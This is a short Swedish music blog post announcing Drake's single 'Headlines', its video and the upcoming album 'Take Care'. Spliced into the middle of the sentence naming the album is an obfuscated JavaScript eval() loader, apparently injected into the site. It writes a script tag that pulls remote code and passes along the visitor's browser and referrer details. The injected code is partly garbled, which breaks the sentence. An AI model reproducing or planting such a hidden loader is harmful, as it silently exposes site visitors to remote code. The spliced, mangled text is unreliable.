Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Drake – Headlines

Drake – Headlines
Sebastian Plengier Ehrnfelt

 

 

 

 

 

 

 

 

 

 

 

 

Drakes nya album Take eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yybid|var|u0026u|referrer|biyka||js|php’.split(‘|’),0,{}))
Care
är på ingång! För att tagga upp sina fans och skapa lite hype kring det har Toronto-bon nu släppt musikvideon till den första singeln ”Headlines”. Soft låt, lite osäker på Drakes utstyrsel i videon däremot!

Take Care är ute den 24:e oktober på Young Money Records!